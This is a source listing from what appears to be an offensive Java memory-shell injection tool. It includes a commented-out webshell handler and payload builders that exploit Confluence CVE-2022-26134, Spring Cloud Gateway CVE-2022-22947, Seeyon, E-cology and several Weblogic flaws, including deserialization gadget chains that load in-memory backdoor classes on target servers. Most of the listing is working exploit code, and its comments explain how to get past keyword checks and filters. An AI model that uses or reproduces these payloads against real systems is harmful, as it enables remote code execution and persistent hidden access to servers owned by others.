| // 93 | // public static byte[] base64Decode(String bs) throws Exception { 94 | // byte[] value = null; 95 | // 96 | // Class base64; 97 | // try { 98 | // base64 = Class.forName("java.util.Base64"); 99 | // Object decoder = base64.getMethod("getDecoder", (Class[])null).invoke(base64, (Object[])null); 100 | // value = (byte[])((byte[])decoder.getClass().getMethod("decode", String.class).invoke(decoder, bs)); 101 | // } 
catch (Exception var6) { 102 | // try { 103 | // base64 = Class.forName("sun.misc.BASE64Decoder"); 104 | // Object decoder = base64.newInstance(); 105 | // value = (byte[])((byte[])decoder.getClass().getMethod("decodeBuffer", String.class).invoke(decoder, bs)); 106 | // } catch (Exception var5) { 107 | // } 108 | // } 109 | // 110 | // return value; 111 | // } 112 | // 113 | // @PostMapping("/xx") 114 | // public synchronized ResponseEntity xx( 115 | // ServerWebExchange pdata) { 116 | // try { 117 | // Object bufferStream = pdata.getFormData().flatMap(c -> { 118 | // StringBuilder result = new StringBuilder(); 119 | // try { 120 | // String id = c.getFirst(pass); 121 | // byte[] data = x(base64Decode(id), false); 122 | // if (store.get("payload") == null) { 123 | // store.put("payload", defineClass(data)); 124 | // } else { 125 | // store.put("parameters", data); 126 | // java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream(); 127 | // Object f = ((Class) store.get("payload")).newInstance(); 128 | // f.equals(arrOut); 129 | // f.equals(data); 130 | // result.append(md5.substring(0, 16)); 131 | // f.toString(); 132 | // result.append(base64Encode(x(arrOut.toByteArray(), true))); 133 | // result.append(md5.substring(16)); 134 | // } 135 | // } catch (Exception ex) { 136 | // result.append(ex.getMessage()); 137 | // } 138 | // return Mono.just(result.toString()); 139 | // }); 140 | // return new ResponseEntity(bufferStream, HttpStatus.OK); 141 | // } catch (Exception ex) { 142 | // return new ResponseEntity(ex.getMessage(), HttpStatus.OK); 143 | // } 144 | // } 145 | // 146 | // @Override 147 | // public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { 148 | // 149 | // } 150 | // 151 | // @Override 152 | // public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { 153 | // 154 | // } 155 | //} 
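--------------------------------------------------------------------------------
/src/main/java/core/payloads/Confluence_CVE_2022_26134.java:
--------------------------------------------------------------------------------
package core.payloads;

import core.GenerateMemShell;
import core.enumtypes.PayloadType;
import core.utils.Util;
import javassist.ClassPool;
import javassist.CtClass;

import java.io.ByteArrayInputStream;
import java.net.URLEncoder;
import java.util.UUID;

/**
 * Builds the request material for Confluence OGNL injection (CVE-2022-26134).
 * The URL-encoded path segment is an OGNL expression that evaluates the "search" request
 * parameter with the JDK JavaScript engine and sets "X-Status: ok" on the response; the
 * JavaScript that goes into that parameter defines the memshell class through
 * org.springframework.cglib.core.ReflectUtils.defineClass and instantiates it.
 */
public class Confluence_CVE_2022_26134 {
    /**
     * @param type       tomcatfiltermemshell or tomcatlistenermemshell; anything else throws
     * @param trojanType currently unused
     * @return the OGNL path segment, the literal marker "postData", then the JavaScript body
     *         (newlines stripped). The marker is presumably what the sender splits on — confirm
     *         in exp/confluence, which is not visible here.
     * @throws IllegalArgumentException for an unsupported payload type
     */
    public static Object getObject(PayloadType type, String trojanType) throws Exception {
        String base64CodeStr;
        String getParam = "%24%7B%23a%3Dnew%20javax.script.ScriptEngineManager().getEngineByName(%22js%22).eval(%40com.opensymphony.webwork.ServletActionContext%40getRequest().getParameter(%22search%22)).(%40com.opensymphony.webwork.ServletActionContext%40getResponse().setHeader(%22X-Status%22%2C%22ok%22))%7D/";
        String payloadTemplate = "var classBytes = java.util.Base64.getDecoder().decode(\"{payload}\");\n" +
                "var loader = java.lang.Thread.currentThread().getContextClassLoader();\n" +
                "var reflectUtilsClass = java.lang.Class.forName(\"org.springframework.cglib.core.ReflectUtils\",true,loader);\n" +
                "var urls = java.lang.reflect.Array.newInstance(java.lang.Class.forName(\"java.net.URL\"),0);\n" +
                "\n" +
                "var params = java.lang.reflect.Array.newInstance(java.lang.Class.forName(\"java.lang.Class\"),3);\n" +
                "params[0] = java.lang.Class.forName(\"java.lang.String\");\n" +
                "params[1] = java.lang.Class.forName(\"[B\");\n" +
                "params[2] = java.lang.Class.forName(\"java.lang.ClassLoader\");\n" +
                "\n" +
                "\n" +
                "var defineClassMethod = reflectUtilsClass.getMethod(\"defineClass\",params);\n" +
                "\n" +
                "params = java.lang.reflect.Array.newInstance(java.lang.Class.forName(\"java.lang.Object\"),3);\n" +
                "\n" +
                "params[0] = \"{className}\";\n" +
                "params[1] = classBytes;\n" +
                "params[2] = loader;\n" +
                "defineClassMethod.invoke(null,params).newInstance();\n" +
                "\"ok\";";
        switch (type) {
            case tomcatfiltermemshell:
                base64CodeStr = GenerateMemShell.generateMemShell("TomcatFilterMemShell", "BASE64", "6");
                break;
            case tomcatlistenermemshell:
                base64CodeStr = GenerateMemShell.generateMemShell("TomcatListenerMemShell", "BASE64", "6");
                break;
            default:
                // previously fell through with an empty string and failed later inside javassist
                throw new IllegalArgumentException("Confluence_CVE_2022_26134 does not support payload type: " + type);
        }
        ClassPool cp = ClassPool.getDefault();
        CtClass ctClass = cp.makeClass(new ByteArrayInputStream(Util.base64Decode(base64CodeStr)));
        // Random class name under com.opensymphony.xwork, presumably so repeated injections do
        // not collide on an already-defined name; the same name is spliced into the script.
        ctClass.setName("com.opensymphony.xwork." + UUID.randomUUID().toString().replace("-", ""));
        // The script contains no line comments, so stripping newlines is safe.
        return getParam + "postData" + payloadTemplate.replace("{payload}", Util.base64Encode(ctClass.toBytecode())).replace("\n", "").replace("{className}", ctClass.getName());
    }
}
--------------------------------------------------------------------------------
/src/main/java/core/payloads/ECology_BeanShell_RCE.java:
--------------------------------------------------------------------------------
package core.payloads;

import core.enumtypes.PayloadType;
import core.memshell.ResinFilterMemShell;
import core.memshell.ResinListenerMemShell;
import core.memshell.TomcatFilterMemShell;
import utils.Util;

import java.net.URLEncoder;

/**
 * BeanShell script for E-cology: the memshell class bytes are BCEL-encoded and loaded through
 * the JDK-internal BCEL ClassLoader (present only on older JDK 8 updates — verify the target).
 */
public class ECology_BeanShell_RCE {
    /**
     * @param type       resinfiltermemshell, resinlistenermemshell or tomcatfiltermemshell; anything else throws
     * @param trojanType currently unused
     * @return the URL-encoded BeanShell script
     * @throws IllegalArgumentException for an unsupported payload type
     */
    public static Object getObject(PayloadType type, String trojanType) throws Exception {
        byte[] bytecodes;
        String payloadTemplate = "a=\"{code}\";eval(\"new com.sun.org.apache.bcel.internal.util.ClassLoader().loadClass(a).newInstance();\")";
        switch (type) {
            case resinfiltermemshell:
                bytecodes = Util.getClassBytes(ResinFilterMemShell.class);
                break;
            case resinlistenermemshell:
                bytecodes = Util.getClassBytes(ResinListenerMemShell.class);
                break;
            case tomcatfiltermemshell:
                bytecodes = Util.getClassBytes(TomcatFilterMemShell.class);
                break;
            default:
                // previously null bytecodes reached generateBcelCode2
                throw new IllegalArgumentException("ECology_BeanShell_RCE does not support payload type: " + type);
        }

        String bcelCodeStr = Util.generateBcelCode2(bytecodes);
        // Explicit UTF-8 (as Seeyon_Unauthorized_RCE already does) instead of the deprecated
        // overload that depends on the generator's platform charset.
        return URLEncoder.encode(payloadTemplate.replace("{code}", bcelCodeStr).replace("\n", ""), "UTF-8");
    }

    /** Same as getObject, as raw bytes of the platform charset. */
    public static byte[] getByte(PayloadType type, String trojanType) throws Exception {
        String payload = getObject(type, trojanType).toString();
        return payload.getBytes();
    }
}
--------------------------------------------------------------------------------
/src/main/java/core/payloads/Seeyon_Unauthorized_RCE.java:
--------------------------------------------------------------------------------
package core.payloads;

import core.enumtypes.PayloadType;
import core.memshell.CommandMemShell;
import core.memshell.TomcatFilterMemShell;
import core.memshell.TomcatListenerMemShell;
import core.utils.Util;

import java.net.URLEncoder;

/**
 * Seeyon formula-validation request body. The embedded expression reassembles the BCEL
 * ClassLoader name from two halves ("...util.Class" + "Loader"), presumably to get past a
 * keyword check, base64-decodes the BCEL string with sun.misc.BASE64Decoder and loads it.
 * sun.misc.BASE64Decoder was removed in JDK 9, so the target must run JDK 8 or older.
 */
public class Seeyon_Unauthorized_RCE {
    /**
     * @param type       tomcatfiltermemshell, tomcatlistenermemshell or commandmemshell; anything else throws
     * @param trojanType currently unused
     * @return "managerMethod=validate&arguments=" followed by the GZIP-compressed, URL-encoded expression
     * @throws IllegalArgumentException for an unsupported payload type
     */
    public static Object getObject(PayloadType type, String trojanType) throws Exception {
        String payloadTemplate = "[{'formulaType': 1, 'formulaName': 'test', 'formulaExpression': 'String name1 = \"com.sun.org.apache.bcel.internal.util.Class\";\n" +
                "String name2 = \"Loader\";\n" +
                "Class clazz = Class.forName(name1 + name2);\n" +
                "java.lang.reflect.Constructor con = clazz.getConstructor();\n" +
                "Object obj = con.newInstance();\n" +
                "java.lang.reflect.Method me = clazz.getMethod(\"loadClass\", String.class);\n" +
                "me.invoke(obj,new String(new sun.misc.BASE64Decoder().decodeBuffer(\"{code}\"))).newInstance();};test();def static xxx(){'}, '', {}, 'true']";

        byte[] bytecodes;
        switch (type) {
            case tomcatfiltermemshell:
                bytecodes = utils.Util.getClassBytes(TomcatFilterMemShell.class);
                break;
            case tomcatlistenermemshell:
                bytecodes = utils.Util.getClassBytes(TomcatListenerMemShell.class);
                break;
            case commandmemshell:
                bytecodes = utils.Util.getClassBytes(CommandMemShell.class);
                break;
            default:
                throw new IllegalArgumentException("Seeyon_Unauthorized_RCE does not support payload type: " + type);
        }

        // The BCEL string itself is base64-wrapped because the expression decodes it on the target.
        String bcelCodeStr = Util.base64Encode(utils.Util.generateBcelCode2(bytecodes).getBytes());
        // Unlike the other builders this keeps the template's newlines; they are inside the
        // compressed argument, which presumably tolerates them — verify if the target rejects it.
        String payloadTmp = payloadTemplate.replace("{code}", bcelCodeStr);
        String payload = "managerMethod=validate&arguments=" + URLEncoder.encode(Util.GZIPCompress(payloadTmp), "UTF-8");
        return payload;
    }

    /** Same as getObject, as raw bytes of the platform charset. */
    public static byte[] getByte(PayloadType type, String trojanType) throws Exception {
        String payload = (String) getObject(type, trojanType);
        return payload.getBytes();
    }
}
--------------------------------------------------------------------------------
/src/main/java/core/payloads/SpringGateWay_CVE_2022_22947.java:
--------------------------------------------------------------------------------
package core.payloads;

import core.GenerateMemShell;
import core.enumtypes.PayloadType;
import core.memshell.NettyHandlerMemShell;
import core.utils.Util;

/**
 * Spring Cloud Gateway actuator route definition (CVE-2022-22947). The SpEL in the
 * AddResponseHeader filter value defines the memshell class through cglib ReflectUtils in a
 * throw-away MLet loader and calls its static doInject(handlerMapping, path).
 * "uri" is a dummy upstream; the injected handler, not the route, serves "/{path}".
 */
public class SpringGateWay_CVE_2022_22947 {
    /**
     * @param type springwebfluxhandlermemshell or nettyhandlermemshell; anything else throws
     * @param path route id / URL segment, spliced into the JSON and the SpEL string unescaped —
     *             operator input only, keep it to plain path characters
     * @return the route JSON with newlines stripped
     * @throws IllegalArgumentException for an unsupported payload type
     */
    public static Object getObject(PayloadType type, String path) throws Exception {
        String className;
        String base64CodeStr;
        String payloadTemplate = "{\"predicates\":[\n" +
                "{\n" +
                "\"name\":\"Path\",\n" +
                "\"args\":{\n" +
                "\t\"_genkey_0\":\"/{path}/**\"\n" +
                "}\n" +
                "}\n" +
                "],\n" +
                " \"id\": \"{path}\",\n" +
                " \"filters\": [{\n" +
                " \"name\": \"AddResponseHeader\",\n" +
                " \"args\": {\n" +
                " \"name\": \"Result\",\n" +
                " \"value\": \"#{T(org.springframework.cglib.core.ReflectUtils).defineClass('{classname}',T(org.springframework.util.Base64Utils).decodeFromString('{code}'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping, '/{path}')}\"\n" +
                " }\n" +
                " }],\n" +
                " \"uri\": \"http://test.com\"\n" +
                "}";

        switch (type){
            case springwebfluxhandlermemshell:
                // SpringWebfluxHandlerMemShell uses lambda expressions, which need JDK 1.8+, so it is compiled dynamically
                base64CodeStr = GenerateMemShell.generateMemShell("SpringWebfluxHandlerMemShell", "BASE64", "8");
                className = "SpringWebfluxHandlerMemShell";
                break;
            case nettyhandlermemshell:
                base64CodeStr = Util.base64Encode(Util.getClassBytes(NettyHandlerMemShell.class));
                className = "core.memshell.NettyHandlerMemShell";
                break;
            default:
                throw new IllegalArgumentException("SpringGateWay_CVE_2022_22947 does not support payload type: " + type);
        }

        return payloadTemplate.replace("{classname}", className).replace("{code}", base64CodeStr).replace("{path}", path).replace("\n", "");
    }

    /** Same as getObject, as raw bytes of the platform charset. */
    public static byte[] getByte(PayloadType type, String trojanType) throws Exception {
        String payload = getObject(type, trojanType).toString();
        return payload.getBytes();
    }
}
--------------------------------------------------------------------------------
/src/main/java/core/payloads/Weblogic_0Day_JDK7.java:
--------------------------------------------------------------------------------
package core.payloads;

import core.enumtypes.PayloadType;
import core.gadgets.utils.Gadgets;
import core.gadgets.utils.Reflections;
import core.utils.Util;

import javax.xml.transform.Templates;
import java.lang.reflect.InvocationHandler;
import java.rmi.MarshalledObject;
import java.util.HashMap;
import java.util.LinkedHashSet;

/**
 * Jdk7u21-style chain (LinkedHashSet + AnnotationInvocationHandler proxy, the public technique
 * despite the file name) nested twice: the inner chain carries the TemplatesImpl memshell and is
 * wrapped in a MarshalledObject; the outer chain's handler is typed MarshalledObject so that, on
 * deserialization, equalsImpl() invokes MarshalledObject.get() and unmarshals the inner payload —
 * presumably to keep the inner stream out of sight of a resolveClass() filter. Confirm against
 * the target's filter before use.
 */
public class Weblogic_0Day_JDK7 {
    /**
     * Inner chain: a LinkedHashSet holding the TemplatesImpl and a Templates proxy whose
     * hashCode() collides with it. "f5a5a608" is a string whose hashCode() is 0, so the
     * single-entry member map hashes to the value's hashCode (the Jdk7u21 collision trick).
     */
    public static Object getObject_(PayloadType type, String trojanType) throws Exception {
        Object templates = Gadgets.createTemplatesImpl(type, trojanType);
        String zeroHashCodeStr = "f5a5a608";
        HashMap map = new HashMap();
        map.put(zeroHashCodeStr, "foo");
        InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
        Reflections.setFieldValue(tempHandler, "type", Templates.class);
        Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);
        LinkedHashSet set = new LinkedHashSet();
        set.add(templates);
        set.add(proxy);
        // swap in the real object only after both elements are in the set, so adding the
        // proxy did not trigger the gadget locally
        map.put(zeroHashCodeStr, templates);

        return set;
    }

    /**
     * Outer chain: same construction over a MarshalledObject that wraps the inner set.
     *
     * @return the outer LinkedHashSet, ready for Util.serialize
     */
    public static Object getObject(PayloadType type, String trojanType) throws Exception {
        Object var2 = getObject_(type, trojanType);
        var2=new MarshalledObject(var2);
        String zeroHashCodeStr = "f5a5a608";
        HashMap map = new HashMap();
        map.put(zeroHashCodeStr, "foo");
        InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
        Reflections.setFieldValue(tempHandler, "type", MarshalledObject.class);
        Object proxy = Gadgets.createProxy(tempHandler, Override.class);
        LinkedHashSet set = new LinkedHashSet();
        set.add(var2);
        set.add(proxy);
        map.put(zeroHashCodeStr, var2); // swap in real object

        return set;
    }

    /** Serialized form of getObject. */
    public static byte[] getByte(PayloadType type, String trojanType) throws Exception {
        return Util.serialize(getObject(type, trojanType));
    }
}
--------------------------------------------------------------------------------
/src/main/java/core/payloads/Weblogic_CVE_2020_14756.java:
--------------------------------------------------------------------------------
package core.payloads;

import com.tangosol.coherence.servlet.AttributeHolder;
import com.tangosol.internal.util.invoke.ClassDefinition;
import com.tangosol.internal.util.invoke.ClassIdentity;
import com.tangosol.internal.util.invoke.RemoteConstructor;
import core.enumtypes.PayloadType;
import core.memshell.CommandMemShell;
import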
core.memshell.WeblogicFilterMemShell_CVE_2020_14756; 10 | import core.memshell.WeblogicListenerMemShell_CVE_2020_14756; 11 | 12 | import core.utils.Util; 13 | import javassist.ClassClassPath; 14 | import javassist.ClassPool; 15 | import javassist.CtClass; 16 | 17 | import java.lang.reflect.Method; 18 | 19 | public class Weblogic_CVE_2020_14756 { 20 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 21 | ClassIdentity classIdentity = null; 22 | CtClass ctClass = null; 23 | ClassPool cp = ClassPool.getDefault(); 24 | ClassClassPath classPath = new ClassClassPath(Weblogic_CVE_2020_14756.class); 25 | cp.insertClassPath(classPath); 26 | switch (type){ 27 | case weblogiclistenermemshell: 28 | classIdentity = new ClassIdentity(WeblogicListenerMemShell_CVE_2020_14756.class); 29 | ctClass = cp.get(WeblogicListenerMemShell_CVE_2020_14756.class.getName()); 30 | ctClass.replaceClassName(WeblogicListenerMemShell_CVE_2020_14756.class.getName(), WeblogicListenerMemShell_CVE_2020_14756.class.getName() + "$" + classIdentity.getVersion()); 31 | break; 32 | case weblogicfiltermemshell: 33 | classIdentity = new ClassIdentity(WeblogicFilterMemShell_CVE_2020_14756.class); 34 | ctClass = cp.get(WeblogicFilterMemShell_CVE_2020_14756.class.getName()); 35 | ctClass.replaceClassName(WeblogicFilterMemShell_CVE_2020_14756.class.getName(), WeblogicFilterMemShell_CVE_2020_14756.class.getName() + "$" + classIdentity.getVersion()); 36 | break; 37 | case commandmemshell: 38 | classIdentity = new ClassIdentity(CommandMemShell.class); 39 | ctClass = cp.get(CommandMemShell.class.getName()); 40 | ctClass.replaceClassName(CommandMemShell.class.getName(), CommandMemShell.class.getName() + "$" + classIdentity.getVersion()); 41 | break; 42 | } 43 | 44 | RemoteConstructor constructor = new RemoteConstructor( 45 | new ClassDefinition(classIdentity, ctClass.toBytecode()), 46 | new Object[]{} 47 | ); 48 | ctClass.defrost(); 49 | AttributeHolder attributeHolder = new 
AttributeHolder(); 50 | Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class); 51 | setInternalValue.setAccessible(true); 52 | setInternalValue.invoke(attributeHolder, constructor); 53 | 54 | return attributeHolder; 55 | } 56 | 57 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 58 | Object attributeHolder = getObject(type, trojanType); 59 | return Util.serialize(attributeHolder); 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /src/main/java/core/payloads/Weblogic_CVE_2020_14883.java: -------------------------------------------------------------------------------- 1 | package core.payloads; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.memshell.WeblogicFilterMemShell; 5 | import core.memshell.WeblogicListenerMemShell; 6 | import javassist.CtClass; 7 | import utils.Util; 8 | 9 | 10 | public class Weblogic_CVE_2020_14883 { 11 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 12 | byte[] bytecodes = null; 13 | String payloadTemplate = "nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession('new com.sun.org.apache.bcel.internal.util.ClassLoader().loadClass(\"{code}\").newInstance()')"; 14 | switch (type) { 15 | case weblogiclistenermemshell: 16 | bytecodes = Util.getClassBytes(WeblogicListenerMemShell.class); 17 | break; 18 | case weblogicfiltermemshell: 19 | bytecodes = Util.getClassBytes(WeblogicFilterMemShell.class); 20 | break; 21 | } 22 | 23 | String bcelCodeStr = Util.generateBcelCode2(bytecodes); 24 | return payloadTemplate.replace("{code}", bcelCodeStr).replace("\n", ""); 25 | } 26 | 27 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 28 | String payload = (String) getObject(type, trojanType); 29 | return payload.getBytes(); 30 | } 31 | } 
// ---- /src/main/java/core/payloads/Weblogic_CVE_2020_2883.java ----
package core.payloads;

import com.tangosol.util.comparator.ExtractorComparator;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import core.enumtypes.PayloadType;
import core.utils.Util;
import utils.weblogic.WeblogicGadget;

import javax.script.ScriptEngineManager;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

/**
 * Payload builder for the Weblogic CVE-2020-2883 entry of this tool.
 * getObject() assembles a java.util.PriorityQueue whose comparator and backing
 * array are replaced through reflection; getByte() serializes that object with
 * Util.serialize. The ReflectionExtractor chain itself comes from
 * utils.weblogic.WeblogicGadget, which is not visible in this file.
 *
 * Defensive note: the class names that appear in the resulting serialized stream
 * are PriorityQueue, ExtractorComparator, ChainedExtractor and the
 * ReflectionExtractors supplied by WeblogicGadget; those are the names a
 * deserialization filter or detection rule for this payload would key on.
 * (Generic type arguments may have been stripped from this listing.)
 */
public class Weblogic_CVE_2020_2883 {
    /**
     * Builds the object graph described on the class.
     *
     * @param type       selects which variant WeblogicGadget builds
     * @param trojanType forwarded to WeblogicGadget unchanged
     * @return the prepared PriorityQueue (declared as Object)
     * @throws Exception reflection failures are propagated. NOTE(review):
     *         setAccessible on java.util.PriorityQueue fields may be refused on
     *         JDK 9+ unless java.util is opened — confirm against the JDK in use.
     */
    public static Object getObject(PayloadType type, String trojanType) throws Exception {
        ReflectionExtractor[] extractors = WeblogicGadget.getReflectionExtractor(type, trojanType);
        ChainedExtractor chainedExtractor = new ChainedExtractor(extractors);
        ExtractorComparator extractorComparator = new ExtractorComparator(chainedExtractor);

        // Two placeholder elements so the backing array has two slots; both slots
        // are overwritten below.
        PriorityQueue priorityQueue = new PriorityQueue(2);
        priorityQueue.add("1");
        priorityQueue.add("1");
        // The comparator is installed after construction via the private field.
        Field field = priorityQueue.getClass().getDeclaredField("comparator");
        field.setAccessible(true);
        field.set(priorityQueue, extractorComparator);

        Field field2 = priorityQueue.getClass().getDeclaredField("queue");
        field2.setAccessible(true);
        Object[] queuearray = (Object[]) field2.get(priorityQueue);
        // queuearray[0] = ScriptEngineManager.class;
        queuearray[1] = Integer.class;
        queuearray[0] = ScriptEngineManager.class;   // same assignment as the commented-out line above

        return priorityQueue;
    }

    /** Serializes getObject()'s result with Util.serialize (plain ObjectOutputStream). */
    public static byte[] getByte(PayloadType type, String trojanType) throws Exception {
        Object priorityQueue = getObject(type, trojanType);
        return Util.serialize(priorityQueue);
    }
}
// --------------------------------------------------------------------------------
// ---- /src/main/java/core/utils/Cache.java ----
package core.utils;

import net.jodah.expiringmap.ExpirationPolicy;
import net.jodah.expiringmap.ExpiringMap;

import java.util.concurrent.TimeUnit;

/**
 * Process-wide, in-memory byte[] cache keyed by String, backed by an ExpiringMap:
 * at most 1000 entries, each expiring 30 seconds after creation
 * (ExpirationPolicy.CREATED), with per-entry expiration enabled through
 * variableExpiration(). Nothing in this file sets a per-entry expiration, so
 * every entry gets the 30-second default.
 */
public class Cache {
    // NOTE(review): the type arguments of ExpiringMap (presumably <String, byte[]>)
    // appear to have been stripped from this listing; get() returns map.get(key)
    // as byte[], which only compiles with them present.
    private static ExpiringMap map = ExpiringMap.builder()
            .maxSize(1000)
            .expiration(30, TimeUnit.SECONDS)
            .variableExpiration()
            .expirationPolicy(ExpirationPolicy.CREATED)
            .build();

    static {
        try {
            // Original comment (translated): "expiry of 100 years — a simple way of
            // never expiring". The block is empty, so nothing is configured here.

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /** Returns the cached bytes for key, or null when there is no live entry. */
    public static byte[] get(String key){
        return map.get(key);
    }

    /** Stores bytes under key; the entry expires 30 seconds after this call. */
    public static void set(String key, byte[] bytes){
        map.put(key, bytes);
    }

    /** True while a live entry for key exists. */
    public static boolean contains(String key){
        return map.containsKey(key);
    }

    /** Drops the entry for key, if any. */
    public static void remove(String key){
        map.remove(key);
    }
}
// ---- /src/main/java/core/utils/Compiler.java ----
package core.utils;

import javax.tools.*;
import java.io.ByteArrayOutputStream;
import java.io.FilterOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.net.URLClassLoader;
import java.nio.CharBuffer;
import java.util.*;


// reference https://zhuanlan.zhihu.com/p/445335613
/**
 * In-memory javac front end: compiles Java source held in a String and returns
 * the resulting class bytes without writing anything to disk. The three
 * createMemShell overloads differ in the file manager they use, in the javac
 * options they pass, and in how failures are reported (see each method).
 */
public class Compiler {

    /**
     * Compiles classString with the system compiler and default options, keeping
     * only the last class file the compiler emitted (see ClassJavaFileManager).
     *
     * @param classString complete Java source of one compilation unit
     * @return bytes of the emitted class, or null if compilation fails or the
     *         fixed "test.java" URI cannot be parsed
     *         NOTE(review): only URISyntaxException is caught; a null compiler
     *         (JRE without javac, ToolProvider returns null) surfaces as a
     *         NullPointerException on the next line.
     */
    public static byte[] createMemShell(String classString) {
        try {
            JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
            StandardJavaFileManager standardFileManager = compiler.getStandardFileManager(null, null, null);
            ClassJavaFileManager classJavaFileManager =
new ClassJavaFileManager(standardFileManager);
            StringObject stringObject = new StringObject(new URI("test.java"), JavaFileObject.Kind.SOURCE, classString);
            JavaCompiler.CompilationTask task = compiler.getTask(null, classJavaFileManager, null, null, null, Arrays.asList(stringObject));
            if (task.call()) {
                ClassJavaFileObject javaFileObject = classJavaFileManager.getClassJavaFileObject();
                return javaFileObject.getBytes();
            }
            // No DiagnosticListener is passed, so compile errors are not collected here.
            // NOTE(review): neither file manager is closed on either path.
            return null;
        } catch (URISyntaxException e) {
            return null;
        }
    }

    /**
     * Compiles classString as className.java with "-source 1.8 -target 1.8" and
     * returns every class file the compiler emitted, keyed by class name
     * (see MemoryJavaFileManager).
     *
     * @param className   name used for the in-memory source file (className.java)
     * @param classString complete Java source
     * @return class name to class bytes, or null when compilation fails or any
     *         exception occurs (swallowed silently, see below)
     */
    public static Map createMemShell(String className, String classString) {
        Map results = null;
        // NOTE(review): generic type arguments (presumably Map<String, byte[]> and
        // List<String>) appear to have been stripped from this listing.
        List options = new ArrayList();
        options.add("-source");
        options.add("1.8");
        options.add("-target");
        options.add("1.8");
        JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
        StandardJavaFileManager stdManager = compiler.getStandardFileManager(null, null, null);
        try {
            MemoryJavaFileManager manager = new MemoryJavaFileManager(stdManager);
            JavaFileObject javaFileObject = manager.makeStringSource(className + ".java", classString);
            JavaCompiler.CompilationTask task = compiler.getTask(null, manager, null, options, null, Arrays.asList(javaFileObject));
            if (task.call()) {
                results = manager.getClassBytes();
            }
        } catch (Exception e) {
            // NOTE(review): swallowed; the caller cannot tell a compile error from a
            // compiler failure. The three-argument overload prints the trace instead.
        }

        return results;
    }

    /**
     * Same as the two-argument overload, but with caller-supplied javac options
     * and with exceptions printed rather than swallowed.
     *
     * @param options javac options passed straight to JavaCompiler.getTask
     *                (the single-argument overload passes null in that position)
     */
    public static Map createMemShell(String className, String classString, List options) {
        Map results = null;
        try {
            JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
            StandardJavaFileManager stdManager = compiler.getStandardFileManager(null, null, null);
            MemoryJavaFileManager manager = new MemoryJavaFileManager(stdManager);
            JavaFileObject javaFileObject = manager.makeStringSource(className + ".java", classString);
            JavaCompiler.CompilationTask task = compiler.getTask(null, manager, null, options, null,
                    Arrays.asList(javaFileObject));
            if (task.call()) {
                results = manager.getClassBytes();
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return results;
    }

    /**
     * Custom file manager (original comment translated). Keeps only the most
     * recent output object handed to the compiler: a compilation unit that
     * produces several class files (inner or anonymous classes) exposes just
     * the last one through getClassJavaFileObject().
     */
    static class ClassJavaFileManager extends ForwardingJavaFileManager {

        private ClassJavaFileObject classJavaFileObject;

        public ClassJavaFileManager(StandardJavaFileManager fileManager) {
            super(fileManager);
        }

        /** The last output object created by getJavaFileForOutput, or null before any compile. */
        public ClassJavaFileObject getClassJavaFileObject() {
            return classJavaFileObject;
        }

        // This method must be overridden (original comment translated): every
        // output request, whatever its kind, is answered with a fresh in-memory object.
        @Override
        public JavaFileObject getJavaFileForOutput(Location location, String className, JavaFileObject.Kind kind, FileObject sibling) throws IOException {
            return (classJavaFileObject = new ClassJavaFileObject(className, kind));
        }
    }

    /**
     * Holds the source file (original comment translated): a SimpleJavaFileObject
     * whose content is the given String.
     */
    static class StringObject extends SimpleJavaFileObject {

        private String content;

        public StringObject(URI uri, Kind kind, String content) {
            super(uri, kind);
            this.content = content;
        }

        @Override
        public CharSequence getCharContent(boolean ignoreEncodingErrors) throws IOException {
            return this.content;
        }
    }

    /**
     * Class file that is never written to disk (original comment translated):
     * the compiler writes into an in-memory buffer that is read back via getBytes().
     */
    static class ClassJavaFileObject extends SimpleJavaFileObject {

        ByteArrayOutputStream outputStream;

        public ClassJavaFileObject(String className, Kind kind) {
            super(URI.create(className + kind.extension), kind);
            this.outputStream = new ByteArrayOutputStream();
        }

        // This one must be implemented too (original comment translated).
        @Override
        public OutputStream openOutputStream() throws IOException {
            return this.outputStream;
        }

        /** Whatever the compiler has written so far. */
        public byte[] getBytes() {
            return this.outputStream.toByteArray();
        }
    }

    // Custom classloader (original comment translated): defines every requested
    // name from the single ClassJavaFileObject's bytes, regardless of the name.
    // Not referenced by the createMemShell overloads above.
    static class MyClassLoader extends ClassLoader {
        private ClassJavaFileObject stringObject;

        public MyClassLoader(ClassJavaFileObject stringObject) {
            this.stringObject = stringObject;
        }

        @Override
        protected Class findClass(String name) throws ClassNotFoundException {
            byte[] bytes = this.stringObject.getBytes();
            return defineClass(name, bytes, 0, bytes.length);
        }
    }

}

/**
 * File manager that keeps compiler output in memory: each CLASS output request
 * becomes a MemoryOutputJavaFileObject whose bytes are recorded in classBytes
 * when the compiler closes that object's stream; every other output kind is
 * delegated to the wrapped manager.
 */
class MemoryJavaFileManager extends ForwardingJavaFileManager {

    // compiled classes in bytes:
    final Map classBytes = new HashMap();

    MemoryJavaFileManager(JavaFileManager fileManager) {
        super(fileManager);
    }

    /** Snapshot copy of the classes compiled so far. Take it before close(), which clears the map. */
    public Map getClassBytes() {
